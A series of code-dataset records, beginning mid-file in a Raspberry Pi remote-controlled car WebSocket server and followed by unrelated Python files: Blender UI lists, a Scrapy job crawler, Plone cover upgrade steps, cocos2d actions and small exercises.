avacar.acceleration < 0.05:\n avacar.acceleration = 0.2\n elif avacar.acceleration >= 0.03 and avacar.acceleration < 1:\n avacar.acceleration += 0.04*avacar.user_acceleration*accelerate\n if avacar.rpm < 1:\n avacar.rpm += 0.1*avacar.user_acceleration*avacar.power_boost*accelerate\n avacar.last_activity_time = datetime.now()\n else:\n if avacar.rpm > 0:\n avacar.rpm -= 0.1\n if avacar.acceleration > 0.03 and args.avacar_type != 'Drift':\n avacar.acceleration -= 0.01\n else:\n avacar.acceleration = 0\n avacar.nitro = False\n\n\n if '40' in keys_list: # Down\n avacar.last_activity_time = datetime.now()\n if avacar.acceleration > 0:\n avacar.acceleration -= 0.3*avacar.user_braking*accelerate\n avacar.brake_last_ts = datetime.now()\n pwm.set_pwm(channels['stop_signal'], 0, 4000)\n elif avacar.acceleration <= 0 and not avacar.rear_drive:\n avacar.acceleration = 0\n avacar.rear_drive = True\n avacar.brake_last_ts = datetime.now()\n pwm.set_pwm(channels['stop_signal'], 0, 4000)\n if avacar.rear_drive and (datetime.now() - avacar.brake_last_ts).total_seconds() > 0.5 and avacar.acceleration > -1:\n avacar.acceleration -= 0.3*accelerate\n # avacar.acceleration = -0.5*avacar.user_max_speed*accelerate\n pwm.set_pwm(channels['rear_signal'], 0, 4000)\n # logging.info(avacar.acceleration)\n else:\n pwm.set_pwm(channels['stop_signal'], 0, 0)\n pwm.set_pwm(channels['rear_signal'], 0, 0)\n\n if avacar.nitro:\n pulse_accelerate = round(args.accelerate_start + args.accelerate_nitro*avacar.user_max_speed*avacar.speed_boost)\n else:\n if avacar.acceleration > 0:\n pulse_accelerate = 
round(args.accelerate_start + avacar.acceleration*args.accelerate_max*avacar.user_max_speed*avacar.speed_boost)\n elif avacar.acceleration == 0:\n pulse_accelerate = args.accelerate_idle\n elif avacar.acceleration < 0:\n # logging.info(avacar.acceleration)\n pulse_accelerate = round(args.backwards_start + avacar.acceleration*args.backwards_max*avacar.user_max_speed*avacar.speed_boost)\n\n if pulse_accelerate:\n # logging.info(pulse_accelerate)\n pwm.set_pwm(channels['accelerate'], 0, pulse_accelerate)\n\n try:\n if '38' not in keys_list and '40' not in keys_list:\n pwm.set_pwm(channels['accelerate'], 0, args.accelerate_idle)\n avacar.nitro = False\n except:\n pass\n\n # if '16' in keys_dict and eval(keys_dict['16']): # Nitro!!\n # if avacar.nitro_level > 0:\n # avacar.nitro = True # Max acceleration\n # avacar.nitro_level -= 0.01\n # else:\n # avacar.nitro = False\n # else:\n # avacar.nitro = False\n\n if '37' in keys_list: # left\n avacar.last_activity_time = datetime.now()\n if not avacar.key_left:\n avacar.key_left = True\n avacar.steering = -0.1*avacar.user_steering\n else:\n if 'gamepad' in keys_dict and -1 <= steering < 0:\n avacar.steering = steering\n else:\n if avacar.steering > -1:\n avacar.steering -= 0.1*avacar.steering_coeff*(2 if avacar.nitro else 1)*avacar.user_steering\n avacar.total_steering += abs(avacar.steering)\n\n pulse_steering = round(args.steering_idle - args.steering_max*avacar.steering)\n # pwm.set_pwm(channels['steering'], 0, pulse_steering)\n message['steering'] = avacar.steering\n\n if '39' in keys_list: # right\n avacar.last_activity_time = datetime.now()\n if not avacar.key_right:\n avacar.key_right = True\n avacar.steering = 0.1*avacar.user_steering\n else:\n if 'gamepad' in keys_dict and 0 < steering < 1:\n avacar.steering = steering\n else:\n if avacar.steering < 1:\n avacar.steering += 0.1*avacar.steering_coeff*(2 if avacar.nitro else 1)*avacar.user_steering\n avacar.total_steering += abs(avacar.steering)\n\n pulse_steering = round(args.steering_idle - args.steering_max*avacar.steering)\n # pwm.set_pwm(channels['steering'], 0, pulse_steering)\n message['steering'] = avacar.steering\n\n try:\n if '39' not in keys_list and '37' not in keys_list:\n avacar.key_left = False\n avacar.key_right = False\n avacar.steering = 0\n pulse_steering = args.steering_idle\n message['steering'] = 0\n except:\n pass\n\n pwm.set_pwm(channels['steering'], 0, pulse_steering)\n\n # Turn camera\n if '65' in keys_list: # Turn left\n pwm.set_pwm(channels['camera'], 0, 500)\n message['hide_dashboard'] = True\n elif '68' in keys_list: # Turn right\n pwm.set_pwm(channels['camera'], 0, 250)\n message['hide_dashboard'] = True\n else:\n pwm.set_pwm(channels['camera'], 0, 375)\n \n\n if avacar.last_hall_pulse and (datetime.now() - avacar.last_hall_pulse).microseconds > 250000:\n avacar.speed = 0\n\n # Count total acceleration sum (required for determining cheaters)\n avacar.total_acceleration += avacar.acceleration\n # logging.info(avacar.total_acceleration)\n\n # Send message back to web\n message['rpm'] = avacar.rpm\n message['speed'] = avacar.speed\n message['nitro_level'] = avacar.nitro_level\n message['distance'] = round(avacar.distance, 2)\n message['speed_max'] = round(avacar.speed_max*3.6, 2)\n message['speed_avg'] = round(avacar.speed_avg*3.6, 2)\n\n if avacar.last_activity_time and (datetime.now() - avacar.last_activity_time).total_seconds() > 50 and not avacar.no_activity:\n no_activity = True\n message['no activity'] = True\n else:\n no_activity = False\n\n if (datetime.now() 
- avacar.last_session_update).total_seconds() > 5:\n message['session_update'] = True\n message['session_id'] = args.session_id\n avacar.last_session_update = datetime.now()\n\n if avacar.line_crossed:\n message['session_update'] = True\n message['session_id'] = args.session_id\n message['line_crossed'] = True\n avacar.line_crossed = False\n avacar.last_session_update = datetime.now()\n\n # logging.info((datetime.now() - ts_start).microseconds)\n # logging.info(avacar.total_steering)\n\n try:\n self.write_message(json.dumps(message))\n except Exception as e:\n logging.error(str(e))\n\n def on_close(self):\n logging.info('Client disconnected, exiting.')\n # with open(avacar.session_log, 'a') as fileH: \n # fileH.write(',' + str(datetime.now()))\n # pwm = Adafruit_PCA9685.PCA9685() # Reset all outputs on PCA9685\n kill_process()\n # os.system('killall -9 raspivid gst-launch-1.0')\n # sys.exit()\n\n def get_wifi_signal(self):\n output = subprocess.Popen('iwconfig', stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n\n for line in str(output.stdout.read()).split('\\\\n'):\n if 'Link Quality' in line:\n try:\n curr, max = line.split()[1].split('=')[1].split('/')\n # link_quality = round((int(curr)/float(max))*100, 2) # Percents\n link_quality = round(int(curr)/float(max), 3)\n signal_level = line.split('=')[2].strip()\n logging.info('%s %s', link_quality, signal_level)\n return link_quality, signal_level\n except:\n return\n\n def get_temp(self):\n try:\n output = subprocess.Popen(['/opt/vc/bin/vcgencmd', 'measure_temp'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n temperature = str(output.stdout.read()).split('=')[1].split(\"'\")[0]\n logging.info(temperature)\n except:\n temperature = ''\n return temperature\n\n def get_battery_level(self):\n ''' Get battery levels '''\n values = [0]*8\n if mcp:\n for i in range(8):\n values[i] = mcp.read_adc(i)\n # logging.info(values)\n digital_level = values[bat_channel]\n battery_level = int((digital_level - bat_min)*100/(bat_max - bat_min))\n if battery_level < 0:\n battery_level = 0\n elif battery_level > 100:\n battery_level = 100\n return battery_level\n else:\n return 0\n\n\n\nif __name__ == '__main__':\n logging.info('Starting process')\n avacar = avacar()\n\n run_avacar_thread = threading.Thread(name='run_avacar', target=run_avacar)\n run_avacar_thread.daemon = True\n run_avacar_thread.start()\n\n # run_engine_thread = threading.Thread(name='run_engine', target=run_engine)\n # run_engine_thread.daemon = True\n # run_engine_thread.start()\n\n # run_weapons_thread = threading.Thread(name='run_weapons', target=run_weapons)\n # run_weapons_thread.daemon = True\n # run_weapons_thread.start()\n\n # Select GPIO numbers, not pin numbers. 
Set the function of the GPIO contacts.\n GPIO.setmode(GPIO.BCM)\n GPIO.setwarnings(False)\n GPIO_map = {\n 'light_sensor': 18,\n 'hall_sensor': 23,\n 'reflect_sensor': 24,\n }\n\n GPIO.setup(GPIO_map['hall_sensor'], GPIO.IN)\n GPIO.add_event_detect(GPIO_map['hall_sensor'], GPIO.BOTH, callback=hallSensor)\n\n GPIO.setup(GPIO_map['light_sensor'], GPIO.IN)\n GPIO.add_event_detect(GPIO_map['light_sensor'], GPIO.BOTH, callback=reflectSensor)\n\n app = tornado.web.Application([(r'/'+args.session_id, WebSocketHandler),])\n\n app.listen(443, ssl_options = {\"certfile\": \"/etc/ssl/avacar.club/avacar.key\", \"keyfile\": \"/etc/ssl/avacar.club/private.key\",}) # SSL mode\n tornado.ioloop.IOLoop.instance().start()\n\n","sub_path":"avacar.py","file_name":"avacar.py","file_ext":"py","file_size_in_byte":26303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
{"seq_id":"79386878","text":"import bpy\nimport os\nfrom . icons import get_icon_id, get_img_icon_id\n\n\nclass ObDataItems(bpy.types.UIList):\n    def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):\n        row = layout.row()\n        if item.data_type == 0:\n            row.label(item.ob.name, icon='VIEW3D')\n            if item.used:\n                used_text = 'Deselect All'\n            else:\n                used_text = 'Select All'\n            row = row.row()\n            row.alignment = 'RIGHT'\n            row.operator('smc.combine_switch', text=used_text, emboss=False).list_id = index\n        elif item.data_type == 1:\n            row.separator()\n            row = row.row(align=True)\n            row.label(text='', icon_value=item.mat.preview.icon_id)\n            row.prop(item.mat, 'name', text='')\n            if item.used:\n                used_icon = 'FILE_TICK'\n            else:\n                used_icon = 'LAYER_USED'\n            row.operator('smc.combine_switch', text='', icon=used_icon).list_id = index\n\n    def invoke(self, context, event):\n        pass\n\n\nclass ImageItems(bpy.types.UIList):\n    def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):\n        row = layout.row()\n        if item.img_type == 0:\n            item_img_icon = get_icon_id('texture')\n        elif item.img_type == 2:\n            item_img_icon = get_icon_id('diffuse')\n        else:\n            if os.path.isfile(item.img_path):\n                item_img_icon = get_img_icon_id(item.img_name, item.img_path)\n            else:\n                item_img_icon = get_icon_id('image_broken')\n        split = row.split(percentage=0.08)\n        split.label(str(index))\n        split = split.split(percentage=0.797)\n        split.prop(item, 'img_name', text='', emboss=False, icon_value=item_img_icon)\n        split = split.split(align=True)\n        if item.img_type == 1:\n            split.prop(item, 'img_color', text='')\n            split.operator('smc.img_reset', text='', icon_value=get_icon_id('clear')).list_id = index\n        elif item.img_type == 2:\n            split.prop(item, 'img_color', text='')\n            split.operator('smc.img_reset', text='', icon_value=get_icon_id('clear')).list_id = index\n        else:\n            split.operator('smc.img_color', text='', icon_value=get_icon_id('diffuse')).list_id = index\n            split.operator('smc.img_path', text='', icon_value=get_icon_id('image_search')).list_id = index\n\n    def invoke(self, context, event):\n        pass\n\n    def filter_items(self, context, data, propname):\n        col = getattr(data, propname)\n        filter_name = self.filter_name.lower()\n        flt_flags = [\n            self.bitflag_filter_item if any(\n                filter_name in filter_set for filter_set in (str(i), item.img_name.lower(), item.img_path.lower()))\n            else 0 for i, item in enumerate(col, 1)]\n\n        if self.use_filter_sort_alpha:\n            flt_neworder = [x[1] for x in sorted(\n                zip([x[0] for x in sorted(enumerate(col), key=lambda x: x[1].img_name)],\n                    range(len(col))))]\n        else:\n            flt_neworder = []\n        
return flt_flags, flt_neworder\n","sub_path":"All_In_One/addons/material-combiner-addon/extend_lists.py","file_name":"extend_lists.py","file_ext":"py","file_size_in_byte":3197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"345334860","text":"from tkinter import *\r\nfrom typing import Set\r\n\r\nclass Screen:\r\n def __init__(self, root:Tk, frame:Frame, canvas:Canvas, screens:tuple):\r\n self.root = root\r\n self.frame = frame\r\n self.canvas = canvas\r\n self.screens = screens\r\n \r\n self.root.update()\r\n self.height = self.root.winfo_height()\r\n self.width = self.root.winfo_width()\r\n \r\n self.canvas.create_line(0, self.height/10, self.width, self.height/10)\r\n \r\n def changeScreen(self, screen:str):\r\n if screen not in self.screens :\r\n raise KeyError(\"This screen does not exist.\")\r\n ","sub_path":"blankPage.py","file_name":"blankPage.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"396650067","text":"\"\"\"\n Crawler for VictoriaGov based on ATSSpider\n scrapy crawl victoriagov -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://careers.vic.gov.au/vacancies\"\n Sample Job URL:\n http://careers.vic.gov.au/vacancies\n\"\"\"\n\nfrom math import ceil\nfrom scrapy.http import FormRequest, Request\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import ConvertDateString, Prefix, MapJobField, MapJobTypes\n\n\nclass VictoriaGov(ATSSpider):\n\n name = 'victoriagov'\n handle_httpstatus_list = [100]\n\n def parse(self, response):\n \"\"\"\n Made POST request call and pass required post parameters.\n \"\"\"\n sel = Selector(response)\n list_url = sel.xpath(\n '//div[@class=\"sideBar\"]/div[@class=\"jobSearch\"]/form/@action'\n ).extract()\n if list_url:\n yield FormRequest(\n callback=self.parse_jobs_list,\n formdata={\n 'in_organid': \"\".join(\n sel.xpath('//form//input[@name=\"in_organid\"]/@value').extract()\n ),\n 'in_position': '',\n 'in_searchBut': 'Go',\n },\n headers={\n 'Connection': 'close',\n },\n url=list_url[0],\n )\n\n def parse_jobs_list(self, response):\n sel = Selector(text=response.body)\n for tr in sel.xpath('//table[@id=\"JobSearchResults\"]/tbody/tr'):\n joburl = tr.xpath('.//a[2]/@href').extract()\n if joburl:\n yield Request(\n callback=self.parse_job_callback(),\n url=urljoin(response.url, joburl[0])\n )\n\n total_results = int(\n \"\".join(\n sel.xpath('//p[@class=\"search_results_txt\"]/b/text()').extract()\n ).split(' ')[0]\n )\n if total_results > 20:\n total_pages = int(ceil(int(total_results) / 20.0))\n previous_page = 40\n current_page = 0\n for page in xrange(2, total_pages + 1):\n current_page += 20\n yield FormRequest(\n callback=self.parse_pages,\n formdata={\n 'in_graphic': '',\n 'in_industry': '',\n 'in_jobDate': 'All',\n 'in_jobType': '',\n 'in_jobreference': '',\n 'in_jobsites': '',\n 'in_location': '',\n 'in_multi01': '',\n 'in_multi01_id': '',\n 'in_multi02': '',\n 'in_multi02_id': '',\n 'in_multi03': '',\n 'in_multi03_id': '',\n 'in_multi04': '',\n 'in_multi04_id': '',\n 'in_multi05': '',\n 'in_multi05_id': '',\n 'in_multi06': '',\n 'in_multi06_id': '',\n 'in_nav': 'next_set',\n 'in_navigation1': '',\n 'in_orderby': '',\n 'in_organid': '14123',\n 'in_param': '',\n 'in_param1': '',\n 'in_param2': '',\n 'in_param3': '',\n 
'in_param4': '',\n 'in_param5': '',\n 'in_pg': str(current_page),\n 'in_position': '',\n 'in_prevpg': str((current_page - previous_page)),\n 'in_recruiter': '',\n 'in_residency': '',\n 'in_salrange': '',\n 'in_selectTally': '',\n 'in_sessionid': '',\n 'in_skills': '',\n 'in_summary': 'S',\n 'in_totalrows': str(total_results),\n 'in_version': '',\n },\n headers={\n 'Connection': 'close',\n },\n url=urljoin(response.url, 'jncustomsearch.searchAction'),\n )\n\n def parse_pages(self, response):\n sel = Selector(text=response.body)\n for tr in sel.xpath('//table[@id=\"JobSearchResults\"]/tbody/tr'):\n job_url = tr.xpath('./td/a[2]/@href').extract()\n if job_url:\n yield Request(\n callback=self.parse_job_callback(),\n url=urljoin(response.url, job_url[0])\n )\n\n def parse_job(self, response):\n sel = Selector(response)\n\n loader = BrightcorpItemLoader(selector=sel)\n\n loader.add_xpath(\n 'title',\n '//div[@id=\"rasp_job_container\"]/div[@id=\"rasp_job_content\"]/div[@class=\"column_L\"]/h2[@class=\"job_title\"]/text() | '\n '//h2[@class=\"job_title\"]/text()|//td[@id=\"dkshade\"]/text()'\n )\n loader.add_xpath(\n 'referencenumber',\n [\n '//div[@id=\"rasp_job_details\"]/table/tbody/tr/td[contains(text(), \"Reference:\")]/following-sibling::td/text()',\n '//td[strong[contains(text(), \"Reference:\")]]/following-sibling::td/text()'\n ],\n Prefix('victoriagov-')\n )\n loader.add_value('url', response.url)\n loader.add_xpath(\n 'company',\n '//tr/td[contains(text(), \"Department:\")]/following-sibling::td[1]/text()'\n )\n loader.add_xpath(\n 'location',\n [\n '//div[@id=\"rasp_job_details\"]/table/tbody/tr/td[contains(text(), \"Work Location:\")]/following-sibling::td/text()',\n '//td[strong[contains(text(), \"Work Location:\")]]/following-sibling::td/text()'\n ]\n )\n loader.add_xpath(\n 'description',\n ['//div[@id=\"rasp_job_descr\"]', \"//table[@id='tbl_search_2']\"]\n )\n loader.add_xpath(\n 'jobcategory',\n '//div[@id=\"rasp_job_details\"]/table/tbody/tr/td[contains(text(), \"Job Function:\")]/following-sibling::td/text()'\n )\n loader.add_xpath(\n 'jobtype',\n '//div[@id=\"rasp_job_details\"]/table/tbody/tr/td[contains(text(), \"Work Type:\")]/following-sibling::td/text()',\n MapJobField(['Ongoing', 'Fixed term', 'Casual'], overriding_map=MapJobTypes.map)\n )\n loader.add_value('apply_url', response.url)\n loader.add_xpath(\n 'duration',\n '//div[@id=\"rasp_job_details\"]/table/tbody/tr/td[contains(text(), \"Job Duration:\")]/following-sibling::td/text()'\n )\n loader.add_xpath(\n 'expiration_date',\n '//tr/td[contains(text(), \"Closing Date:\")]/following-sibling::td[1]/text()',\n ConvertDateString('%d-%b-%Y')\n )\n loader.add_xpath(\n 'baseSalary',\n '//div[@id=\"rasp_job_details\"]/table/tbody/tr/td[contains(text(), \"Salary Range:\")]/following-sibling::td/text()'\n )\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/victoriagov.py","file_name":"victoriagov.py","file_ext":"py","file_size_in_byte":7352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"431619385","text":"# Copyright 2016 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. 
You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom __future__ import absolute_import\nfrom __future__ import unicode_literals\n\nimport unittest\n\n# pylint: disable=import-error\nfrom mock import call\nfrom mock import Mock\nfrom mock import patch\n# pylint: enable=import-error\n\nfrom core.models.fuel_client import client\n\n# pylint: disable=no-self-use\n\n\n@patch('core.models.fuel_client.client.logger', autospec=True)\n@patch('core.models.fuel_client.base_client.Adapter', autospec=True)\nclass TestClient(unittest.TestCase):\n def test_init(self, adapter, logger):\n session = Mock(spec='keystoneauth1.session.Session')\n session.attach_mock(Mock(), 'auth')\n session.auth.auth_url = 'http://127.0.0.1'\n\n obj = client.Client(session=session)\n\n self.assertIn(\n call(service_type=u'ostf', session=session),\n adapter.mock_calls\n )\n\n logger.assert_has_calls((\n call.info(\n 'Initialization of NailgunClient using shared session \\n'\n '(auth_url={})'.format(session.auth.auth_url)),\n ))\n\n self.assertIn('ostf', dir(obj))\n","sub_path":"core/_tests/models/fuel_client/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"90732133","text":"# -*- coding: utf-8 -*-\n\nimport os, sys, uuid\nimport thriftpy\nfrom thriftpy.protocol import TCyBinaryProtocolFactory\nfrom thriftpy.transport import TCyBufferedTransportFactory\nfrom ssf.settings import PROJECT_PATH\n\nthriftpy.install_import_hook()\nfrom esus.esus_thrift import *\n\ndiretorio = os.path.abspath(os.path.join(PROJECT_PATH, '..', 'esus/arquivos'))\ncaminhos = [os.path.join(diretorio, arquivo) for arquivo in os.listdir(diretorio)]\narquivos = [arq for arq in caminhos if os.path.isfile(arq)]\n\n# enviarUuidDadoSerializado = 'versao.Versao'+'uuid.uuid4()'\n\ntipos = {\n 2:CadastroIndividual(),\n 3:CadastroDomiciliar(),\n 4:AtendimentoIndividual(),\n 5:AtendimentoOdontologico(),\n 6:AtividadeColetiva(),\n 7:Procedimentos(),\n 8:VisitaDomiciliar(),\n 10:AtendimentoDomiciliar(),\n 11:AvaliacaoElegibilidade(),\n 12:ConsumoAlimentar(),\n}\n\ndef serializados(dado,ficha):\n d = thriftpy.transport.TMemoryBuffer(dado)\n d1 = thriftpy.protocol.TBinaryProtocol(d)\n d2 = ficha()\n d2.read(d1)\n return d2\n\nfor arquivo in arquivos:\n thrift = open(arquivo)\n transport = thriftpy.transport.TBufferedTransport(thrift)\n protocol = thriftpy.protocol.TBinaryProtocol(transport)\n trans = Transporte()\n trans.read(protocol)\n ficha = tipos.get(trans.tipoDadoSerializado)\n dado = trans.dadoSerializado\n serializados(dado,ficha)\n\n\n\n","sub_path":"esus/esus_client.py","file_name":"esus_client.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"130066112","text":"lista = list()\nwhile True:\n lista.append(int(input('Digite um número: ')))\n x = str(input('Deseja continuar? [S/N]')).strip().upper()[0]\n while not (x in 'SN'):\n x = str(input('Não entendi. Deseja continuar? 
[S/N]')).strip().upper()[0]\n    if x in 'N':\n        break\npares = list()\nimpares = list()\nfor pos, valor in enumerate(lista):\n    if valor % 2 == 0:\n        pares.append(lista[pos])\n    else:\n        impares.append(lista[pos])\nprint('-='*15)\nprint(f'Os valores digitados foram: {lista}')\nprint(f'Os valores pares digitados foram: {pares}')\nprint(f'Os valores ímpares digitados foram: {impares}')","sub_path":"Exercícios_1-106/Exercício_082.py","file_name":"Exercício_082.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"527594813","text":"#-*- coding: utf-8 -*-\n\nfrom cocos.actions import *\n\nclass ScaleXY(IntervalAction):\n\t\"\"\"Scales a `CocosNode` object by modifying scalex and scaley\n\t\"\"\"\n\n\tdef init(self,scalex,scaley,duration):\n\t\tself.end_scalex=scalex\n\t\tself.end_scaley=scaley\n\t\tself.duration=duration\n\n\tdef start(self):\n\t\tself.start_scalex=self.target.scalex\n\t\tself.start_scaley=self.target.scaley\n\t\tself.deltax=self.end_scalex-self.start_scalex\n\t\tself.deltay=self.end_scaley-self.start_scaley\n\n\tdef update(self,t):\n\t\tself.target.scalex=self.start_scalex+self.deltax*t\n\t\tself.target.scaley=self.start_scaley+self.deltay*t\n\nclass RandPos(IntervalAction):\n\tm_Count=10\n\n\tdef init(self,duration):\n\t\tself.duration=duration\n\t\tself.idx=0\n\n\tdef start(self):\n\t\timport random\n\t\tx,y=self.target.position\n\t\tself.idx=0\n\t\tself.randpos=[]\n\t\tfor _ in range(self.m_Count+1):\n\t\t\txrand=random.randint(-5,5)\n\t\t\tyrand=random.randint(-5,5)\n\t\t\tself.randpos.append((x+xrand,y+yrand))\n\t\tself.origin=x,y\n\n\tdef update(self,t):\n\t\tif t>=1.0:\n\t\t\tself.target.position=self.origin\n\t\t\treturn\n\t\tself.idx+=1\n\t\tif self.idx>self.m_Count:\n\t\t\tself.idx=0\n\t\tself.target.position=self.randpos[self.idx]\n\n","sub_path":"script/action.py","file_name":"action.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"496251209","text":"# -*- coding: utf-8 -*-\nfrom collective.cover.controlpanel import ICoverSettings\nfrom collective.cover.interfaces import ICover\nfrom collective.cover.logger import logger\nfrom collective.cover.tiles.configuration import ANNOTATIONS_KEY_PREFIX as PREFIX\nfrom collective.cover.upgrades import _get_tiles_inherit_from_list\nfrom copy import deepcopy\nfrom plone import api\nfrom plone.registry.interfaces import IRegistry\nfrom plone.tiles.interfaces import ITileDataManager\nfrom zope.component import getUtility\n\nimport json\n\n\ndef fix_persistentmap_to_dict(context):\n    \"\"\"Internal structure was reverted from using PersistentMapping.\n    Fix tiles here\"\"\"\n\n    # Get covers\n    covers = context.portal_catalog(portal_type='collective.cover.content')\n    logger.info('About to update {0} objects'.format(len(covers)))\n    tiles_to_update = _get_tiles_inherit_from_list(context)\n    logger.info('{0} tile types will be updated ({1})'.format(\n        len(tiles_to_update), ', '.join(tiles_to_update)))\n    for cover in covers:\n        obj = cover.getObject()\n        tile_ids = obj.list_tiles(types=tiles_to_update)\n        for tile_id in tile_ids:\n            tile = obj.get_tile(tile_id)\n            old_data = ITileDataManager(tile).get()\n            uuids = old_data['uuids']\n            if isinstance(uuids, dict):\n                # This tile is fixed, carry on\n                msg = 'Tile {0} at {1} was already updated'\n                logger.info(msg.format(tile_id, cover.getPath()))\n                continue\n            if not uuids:\n                # This tile did not have data, so ignore\n                msg = 'Tile {0} at {1} did not have any data'\n                logger.info(msg.format(tile_id, cover.getPath()))\n                continue\n\n            new_data = dict()\n            for k, v in uuids.items():\n                new_data[k] = v\n\n            old_data['uuids'] = new_data\n            ITileDataManager(tile).set(old_data)\n\n            msg = 'Tile {0} at {1} updated'\n            logger.info(msg.format(tile_id, cover.getPath()))\n\n    logger.info('Done')\n\n\ndef _remove_css_class_layout(layout, is_child=False):\n    \"\"\"Recursively remove class attribute from layout.\"\"\"\n    if not is_child:\n        layout = json.loads(layout)\n    fixed_layout = []\n    for row in layout:\n        fixed_row = {\n            k: v\n            for k, v in row.iteritems()\n            if k != u'class'\n        }\n        if u'children' in fixed_row:\n            fixed_row[u'children'] = _remove_css_class_layout(fixed_row[u'children'], True)\n        fixed_layout.append(fixed_row)\n    if is_child:\n        return fixed_layout\n    else:\n        fixed_layout = json.dumps(fixed_layout)\n        return fixed_layout.decode('utf-8')\n\n\ndef remove_css_class_layout(context):\n    \"\"\"Remove CSS class from registry and cover layouts.\"\"\"\n    logger.info('CSS classes will be removed from Cover layouts.')\n    # Fix registry layouts\n    registry = getUtility(IRegistry)\n    settings = registry.forInterface(ICoverSettings)\n    fixed_layouts = {}\n    for name, layout in settings.layouts.iteritems():\n        fixed_layouts[name] = _remove_css_class_layout(layout)\n    settings.layouts = fixed_layouts\n    logger.info('Registry layouts were updated.')\n\n    # Fix cover layouts\n    covers = context.portal_catalog(object_provides=ICover.__identifier__)\n    logger.info('Layout of {0} objects will be updated'.format(len(covers)))\n\n    for cover in covers:\n        obj = cover.getObject()\n        obj.cover_layout = _remove_css_class_layout(obj.cover_layout)\n        logger.info('\"{0}\" was updated'.format(obj.absolute_url_path()))\n\n\ndef remove_orphan_annotations(context):\n    \"\"\"Remove annotations left behind after tile removal.\n\n    The bug was fixed in bf386fee but no upgrade step was provided to\n    clean up the objects.\n    \"\"\"\n    catalog = api.portal.get_tool('portal_catalog')\n    results = catalog(object_provides=ICover.__identifier__)\n    logger.info('Checking {0} objects for orphan annotations'.format(len(results)))\n\n    for brain in results:\n        cover = brain.getObject()\n        tiles = cover.list_tiles()\n\n        try:\n            orphan_annotations = [\n                k for k in cover.__annotations__.keys()\n                if k.startswith(PREFIX) and k.split('.')[3] not in tiles\n            ]\n\n            for k in orphan_annotations:\n                del(cover.__annotations__[k])\n\n            if orphan_annotations:\n                msg = 'Removed {0} annotations from \"{1}\"'\n                logger.info(\n                    msg.format(len(orphan_annotations), cover.absolute_url_path()))\n\n        except AttributeError:\n            pass # cover with no annotations\n\n\ndef _simplify_layout(layout, is_child=False):\n    \"\"\"Recursively move column-size to parent and remove data attribute from layout.\"\"\"\n    if not is_child:\n        layout = json.loads(layout)\n    fixed_layout = []\n    for row in layout:\n        fixed_row = deepcopy(row)\n        if u'data' in row:\n            if u'column-size' in row[u'data']:\n                fixed_row[u'column-size'] = fixed_row[u'data'][u'column-size']\n            del(fixed_row[u'data'])\n        if u'children' in fixed_row:\n            fixed_row[u'children'] = _simplify_layout(fixed_row[u'children'], True)\n        fixed_layout.append(fixed_row)\n    if is_child:\n        return fixed_layout\n    else:\n        fixed_layout = json.dumps(fixed_layout)\n        return fixed_layout.decode('utf-8')\n\n\ndef simplify_layout(context):\n    \"\"\"Move column-size to parent and remove data attribute from layout.\"\"\"\n    logger.info('Cover layouts will be simplified.')\n    # Fix registry layouts\n    registry = getUtility(IRegistry)\n    settings = registry.forInterface(ICoverSettings)\n    fixed_layouts = {}\n    for name, layout in settings.layouts.iteritems():\n        fixed_layouts[name] = _simplify_layout(layout)\n    settings.layouts = fixed_layouts\n    logger.info('Registry layouts were updated.')\n\n    # Fix cover layouts\n    covers = context.portal_catalog(object_provides=ICover.__identifier__)\n    logger.info('Layout of {0} objects will be updated'.format(len(covers)))\n\n    for cover in covers:\n        obj = cover.getObject()\n        obj.cover_layout = _simplify_layout(obj.cover_layout)\n        logger.info('\"{0}\" was updated'.format(obj.absolute_url_path()))\n","sub_path":"buildout-cache/eggs/collective.cover-1.2b1-py2.7.egg/collective/cover/upgrades/v11/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"558437709","text":"#Author: Robert Schreibman\r\n#Date: 2-8-18\r\n#Description:\r\n#Think Exercise Answers: a1, a2, a3, and c1\r\n\r\n#Questions\r\n#a1) At what clock value is data transmitted? (0-falling or 1-rising?)\r\n    # 0-falling edge of clock\r\n#a2) At what clock value is data received? (0-falling or 1-rising?)\r\n    # 1-rising edge of clock\r\n#a3) How many bytes are transmitted/received? (recall 1 byte = 8 bits)\r\n    # 2 bytes are transmitted (only uses 10 bits though)\r\n#c1) Max Value for 10 bits is 2^10 - 1 = 1023\r\n\r\n#import libraries:\r\nimport numpy as np #numpy for arrays\r\nimport time\t\t #time to use the sleep command\r\nimport spidev #spidev as spi for working with the ADC\r\nimport RPi.GPIO as GPIO\t\t#controls General Purpose I/O 